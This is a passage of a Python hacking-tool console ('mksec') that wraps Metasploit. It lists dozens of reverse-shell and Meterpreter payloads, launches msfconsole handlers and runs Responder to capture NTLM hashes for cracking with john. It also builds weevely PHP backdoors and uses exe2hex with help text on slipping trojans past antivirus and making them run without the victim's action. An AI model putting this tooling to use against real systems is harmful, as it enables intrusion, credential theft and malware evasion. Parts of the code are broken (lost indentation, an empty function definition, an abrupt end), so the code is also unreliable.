Listen for a connection with UUID Support (Windows x86)\nwindows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection\nwindows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6\nwindows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)\nwindows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/upexec/reverse_udp Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). 
Listen for an IPv6 connection (Windows x86)\nwindows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)\nwindows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)\nwindows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)\nwindows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection\nwindows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection\nwindows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)\nwindows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP\nwindows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6\nwindows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)\nwindows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). 
Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)\nwindows/x64/exec Execute an arbitrary command (Windows x64)\nwindows/x64/loadlibrary Load an arbitrary x64 library path\nwindows/x64/messagebox Spawn a dialog via MessageBox using a customizable title, text & icon\nwindows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)\nwindows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/bind_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Connect back to the attacker\nwindows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (Windows x64)\nwindows/x64/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Tunnel communication over HTTPS (Windows x64 winhttp)\nwindows/x64/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection (Windows x64)\nwindows/x64/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. 
Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a pipe connection (Windows x64)\nwindows/x64/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connection(Windows x64)\nwindows/x64/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connectionwith UUID Support (Windows x64)\nwindows/x64/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker via a named pipe pivot\nwindows/x64/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker (Windows x64)\nwindows/x64/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. 
This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x64)\nwindows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/shell/bind_named_pipe Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/shell/bind_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). 
Listen for a connection with UUID Support (Windows x64)\nwindows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/shell/reverse_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)\nwindows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). 
Connect back to the attacker (Windows x64)\nwindows/x64/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)\n""")
elif "run" == uinput.lower():
print("Please wait...")
os.system("sudo msfconsole -q -x 'use exploit/multi/handler; set payload " + payload.strip() + "; set lhost " + host.strip() + "; set lport "+ port.strip() + "; exploit'")
elif "run -f" == uinput.lower():
print("Please wait...")
os.system("cd /opt/metasploit-framework/ && sudo ./msfconsole -q -x 'use exploit/multi/handler; set payload " + payload.strip() + "; set lhost " + host.strip() + "; set lport "+ port.strip() + "; exploit'")
create = " FALSE "
listener = " FALSE "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[payload_creater_and_listener]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mPayload Creator and Listener is a payload creation and listening tool. This tool uses the Msfvenom and Msfconsole tools. Edited by mksec using the 'exploit/multi/handler' module in the Metasploit tool. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mPayload Creator and Listener, bir payload oluşturma ve dinleme aracıdır. Bu araç, Msfvenom ve Msfconsole araçlarını kullanır. Metasploit aracı içerisindeki 'exploit/multi/handler' modülünü kullanarak mksec tarafından düzenlenmiştir.\x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCREATE PAYLOAD {} OPT Set this value to 'TRUE' to create a payload. \x1b[32mDefault value = FALSE\x1b[37m\nPAYLOAD LISTENER {} OPT Set this value to 'TRUE' to listen for a payload. \x1b[32mDefault value = FALSE\x1b[37m".format(create,listener))
elif "set create payload" in uinput.lower():
create = uinput
create = create.replace("set create payload ","").replace("set CREATE PAYLOAD ","").replace("SET create payload ","").replace("SET CREATE PAYLOAD ","").center(25).upper()
elif "set payload listener" in uinput.lower():
listener = uinput
listener = listener.replace("set payload listener ","").replace("set PAYLOAD LISTENER ","").replace("SET payload listener ","").replace("SET PAYLOAD LISTENER ","").center(25).upper()
elif "run" == uinput.lower():
if create.lower().strip() == "true" and listener.lower().strip() == "false":
PayloadCreater()
elif listener.lower().strip() == "true" and create.lower().strip() == "false":
PayloadListener()
elif create.lower().strip() == "true" and listener.lower().strip() == "true":
print('\x1b[1m\x1b[31mYou cannot choose both.')
else:
print("\x1b[1m\x1b[31mYou have not selected one yet\x1b[1m")
def searchsploit():
    """Interactive sub-console wrapping the `searchsploit` ExploitDB tool.

    Command loop: `info` / `options` print help text, `set search <term>`
    stores the query, `run` shells out to searchsploit.  The loop never
    returns on its own; leaving it is handled inside UserInputs().
    """
    import shlex  # local import: quote user input before it reaches the shell

    def _value_after(text, prefix):
        # Case-insensitive extraction of the text following `prefix`.
        # The original replace()-chain only handled the four all-lower /
        # all-upper spellings and kept mixed-case input (e.g. "Set Search
        # ftp") unchanged.
        pos = text.lower().find(prefix)
        return text[pos + len(prefix):] if pos != -1 else text

    search = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[searchsploit]\033[37m\x1b[0m ")
        UserInputs(uinput + "exp")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mSearchsploit easily presents exploits found on the system by ExploitDB to us via terminal.\n\x1b[33mTR:\x1b[37mSearchsploit, ExploitDB tarafından sistemde bulunan exploitleri bize kolayca terminal üzerinden sunar. ")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nSEARCH{} YES Type the exploit you want to search \x1b[32mex: ftp\x1b[37m".format(search))
        elif "set search" in uinput.lower():
            # .center(25) pads the value for the `options` table display.
            search = _value_after(uinput, "set search ").center(25)
        elif "run" == uinput.lower():
            # Quote each term individually: multi-word searches still reach
            # searchsploit as separate arguments, but shell metacharacters
            # in the user's input can no longer inject extra commands.
            os.system("searchsploit " + " ".join(shlex.quote(t) for t in search.strip().split()))
def macchanger():
    """Interactive sub-console wrapping `macchanger` for MAC spoofing.

    Command loop: `set iface` / `set manual` store settings, then
    `run -r/--random` randomizes, `run -m/--manual` applies MANUAL, and
    `run -d/--default` restores the permanent MAC of IFACE.
    """
    import shlex  # local import: quote user input before it reaches the shell

    def _value_after(text, prefix):
        # Case-insensitive prefix strip; the original replace()-chain
        # missed mixed-case spellings such as "Set Iface eth0".
        pos = text.lower().find(prefix)
        return text[pos + len(prefix):] if pos != -1 else text

    iface = " "
    manual = " "
    # Best-effort guess of the machine's second interface from `ip addr`
    # output, shown as a hint in the options table.  The parse is fragile
    # (assumes a literal "2:" marker), so fail soft instead of raising
    # IndexError when the output looks different.  The original also ran a
    # second `ip addr show` whose result was discarded; that dead statement
    # has been removed.
    try:
        youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
    except IndexError:
        youriface = "unknown"
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[macchanger]\033[37m\x1b[0m ")
        UserInputs(uinput + "sniff")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[37m\x1b[35mMacchanger\x1b[37m, it is used to change the MAC address.\n\n\x1b[33mUsage:\x1b[37m\n\x1b[33m======\x1b[37m\nIf you want to randomly change your MAC address just fill in 'IFACE' and type \x1b[32m'run --random' or 'run -r'\x1b[37m.\nIf you want to change your MAC address manually, fill in 'IFACE' and 'MANUAL' and type \x1b[32m'run --manual' or 'run -m'\x1b[37m.\nIf you want to revert to your default MAC address just fill in 'IFACE' and type \x1b[32m'run --default' or 'run -d'\x1b[37m.\n\n\n\x1b[35mMacchanger\x1b[37m, MAC adresini değiştirmek için kullanılır.\n\n\x1b[33mKullanım:\x1b[37m\n\x1b[33m=========\x1b[37m\nRandom olarak MAC adresinizi değiştirmek istiyorsanız sadece 'IFACE' kısmını doldurun ve \x1b[32m'run --random' or 'run -r'\x1b[37m yazın.\nManuel olarak MAC adresinizi değiştirmek istiyorsanız 'IFACE' ve 'MANUAL' kısımlarını doldurun ve \x1b[32m'run --manual' or 'run -m'\x1b[37m yazın.\nDefault MAC adresinize geri dönmek istiyorsanız sadece 'IFACE' kısmını doldurun ve \x1b[32m'run --default' or 'run -d'\x1b[37m yazın.\n")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Your interface =\x1b[32m{}\x1b[37m\nMANUAL{} OPT Manual MAC address \x1b[32mex: 11:22:33:33:22:11\x1b[37m".format(iface, youriface, manual))
        elif "set iface" in uinput.lower():
            iface = _value_after(uinput, "set iface ").center(25)
        elif "set manual" in uinput.lower():
            manual = _value_after(uinput, "set manual ").center(25)
        elif "run" == uinput.lower():
            # Bare `run` is ambiguous here; the user must pick a mode flag.
            print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
        elif "run --random" == uinput.lower() or "run -r" == uinput.lower():
            # Interface / MAC values are raw user input headed for a shell
            # command line; shlex.quote neutralizes metacharacters.
            os.system("sudo macchanger -r " + shlex.quote(iface.strip()))
        elif "run --manual" == uinput.lower() or "run -m" == uinput.lower():
            os.system("sudo macchanger --mac " + shlex.quote(manual.strip()) + " " + shlex.quote(iface.strip()))
        elif "run --default" == uinput.lower() or "run -d" == uinput.lower():
            os.system("sudo macchanger -p " + shlex.quote(iface.strip()))
def responder():
    """Show the Responder help banner (Turkish), prompt for an interface,
    and launch `responder -I <iface>`; typing `back` returns to the
    sniffing/spoofing menu instead.

    The banner and hint texts are emitted via `echo` and are user-facing
    runtime strings, so they are kept exactly as written.
    """
    import shlex  # local import: quote user input before it reaches the shell
    os.system("""echo \x1b[1m'
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
| responder |
| |
| ag uzerindeki cihazlarin netbios undan gelen istekleri izler ve takip eder |
| |
| ag uzerindeki cihaz, |
| dosya paylasiminda ya da sitelerde sifre girdiyse bunlarin log kaydini hashli sekilde tutar |
| aracin log kayitlari /usr/share/responder/logs/ icerisinde tutulur |
| ex: /usr/share/responder/logs/HTTP-NTLMv2-192.168.10.8.txt |
| |
| hashli verileri nasil kirabilirsiniz? |
| john /usr/share/responder/logs/HTTP-NTLMv2-192.168.10.8.txt |
| |
| back go back |
|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-|'
""")
    os.system("echo '\n'")
    # Show the available interfaces so the user knows what to type.
    os.system("ifconfig")
    os.system("echo 'ex: eth0'")
    uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
    if uinput == "back":
        os.system("clear")
        # Return to the parent menu (defined elsewhere in this file).
        sniffingSpoofing()
    else:
        os.system("""echo '
agdaki cihazlari izleme isleminiz bittiginde ctrl+c ile islemi istediginiz zaman sonlandirin
devam ederseniz, agdaki cihazlari sonsuza kadar takip edecektir ve log kayitlari tutacaktir'""")
        os.system("echo ' simdi baslamak icin ctrl + c yapiniz ' -a -d backback9")
        # The interface name is raw user input headed for a shell command
        # line; shlex.quote prevents command injection through it.
        os.system("responder -I " + shlex.quote(uinput))
def exe2hex():
    """Interactive sub-console wrapping the `exe2hex` binary-to-hex tool.

    Command loop: `set file` / `set output` store the input binary and the
    .cmd output path; `run` uses the system-installed exe2hex and `run -f`
    falls back to the copy under /opt/exe2hex/.
    """
    import shlex  # local import: quote user input before it reaches the shell

    def _value_after(text, prefix):
        # Case-insensitive prefix strip; the original replace()-chain
        # missed mixed-case spellings such as "Set File x.exe".
        pos = text.lower().find(prefix)
        return text[pos + len(prefix):] if pos != -1 else text

    userexe = " "
    userpayload = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[exe2hex]\033[37m\x1b[0m ")
        UserInputs(uinput + "post")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mExe2hex is a tool that converts exe files to hexadecimal codes. (Not only the .exe extension, it also works for .py files or any file extension.)\n\x1b[35mWhat does it do?\x1b[37m\nUsually, trojans are caught by firewalls or antivirus programs.\nIf we convert the trojan to hexadecimal codes, firewalls and antivirus programs may not understand hexadecimal codes.\nFor this reason, it is difficult to detect.\nIn some cases it can never be detected.\n\x1b[35mThe situation to be considered after using the exe2hex tool!\x1b[37m\nType 'start file_name.exe' in the last line of the created .cmd file.\n\x1b[35mWhat happens if you don't?\x1b[37m\nThe exe extension will not run automatically.\nUser has to open file_name.exe manually and we don't like that (:\nIf the \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mExe2hex, exe dosyalarını hexadecimal kodlarına çeviren bir araçtır. (Sadece .exe uzantısı değil, .py uzantılı dosyalar ya da herhangi bir dosya uzantısında da işe yarar.)\n\x1b[35mNe işe yarar?\x1b[37m\nGenellikle trojanlar güvenlik duvarlarına ya da antivirüs programlarına yakalanır.\nEğer trojanı hexadecimal kodlarına çevirirsek güvenlik duvarları ve antivirüs programları hexadecimal kodlarını anlamayabilir.\nBu nedenden dolayı tespit etmekte zorlanır.\nBazı durumlarda asla tespit edilemez.\n\x1b[35mExe2hex aracı kullanıldıktan sonra dikkat edilmesi gereken durum!\x1b[37m\nolusturulan .cmd uzantılı dosyanın son satırına 'start dosya_adı.exe' yazınız.\n\x1b[35mEğer bunu yapmazsanız ne olur?\x1b[37m\nExe uzantısı otomatik olarak çalıştırılmayacaktır.\nKullanıcı manuel olarak dosya_adı.exe dosyasını açması gerekir ve biz bunu sevmeyiz (:\n\x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFILE {} YES The EXE binary file to convert \x1b[32mex: /root/Desktop/mksec.exe\x1b[37m\nOUTPUT{} YES Extension must end with .cmd \x1b[32mex: /root/Desktop/mksec.cmd\x1b[37m".format(userexe, userpayload))
        elif "set file" in uinput.lower():
            userexe = _value_after(uinput, "set file ").center(25)
        elif "set output" in uinput.lower():
            userpayload = _value_after(uinput, "set output ").center(25)
        elif "run" == uinput.lower():
            # Both paths are raw user input headed for a shell command line;
            # shlex.quote also makes paths containing spaces work.
            os.system("sudo exe2hex -x " + shlex.quote(userexe.strip()) + " -o " + shlex.quote(userpayload.strip()))
        elif "run -f" == uinput.lower():
            os.system("cd /opt/exe2hex/ && sudo python3 exe2hex.py -x " + shlex.quote(userexe.strip()) + " -o " + shlex.quote(userpayload.strip()))
def weevely():
def createabackdoor():
    """Prompt loop that builds a password-protected backdoor via
    `weevely generate <password> <output>`.

    `set password` / `set output` store the settings; `run` invokes weevely.
    """
    import shlex  # local import: quote user input before it reaches the shell

    def _value_after(text, prefix):
        # Case-insensitive prefix strip; the original replace()-chain
        # missed mixed-case spellings such as "Set Password x".
        pos = text.lower().find(prefix)
        return text[pos + len(prefix):] if pos != -1 else text

    output = " "
    backdoorpassword = " "
    while 1:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[create_backdoor]\033[37m\x1b[0m ")
        UserInputs(uinput + "post")
        if uinput.lower() == "info":
            print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m ile sifreli bir shell(backdoor) olusturun!")
        elif uinput.lower() == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPASSWORD{} YES Add password \x1b[32mex: ex: passw0rd!\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/backdoor.php\x1b[37m".format(backdoorpassword, output))
        elif "set password" in uinput.lower():
            backdoorpassword = _value_after(uinput, "set password ").center(25)
        elif "set output" in uinput.lower():
            output = _value_after(uinput, "set output ").center(25)
        elif "run" == uinput.lower():
            # Password and output path are raw user input headed for a shell
            # command line; quoting also lets passwords contain shell
            # metacharacters (e.g. "!" or ";") without breaking the call.
            os.system("weevely generate " + shlex.quote(backdoorpassword.strip()) + " " + shlex.quote(output.strip()))
def backdoorlistener():
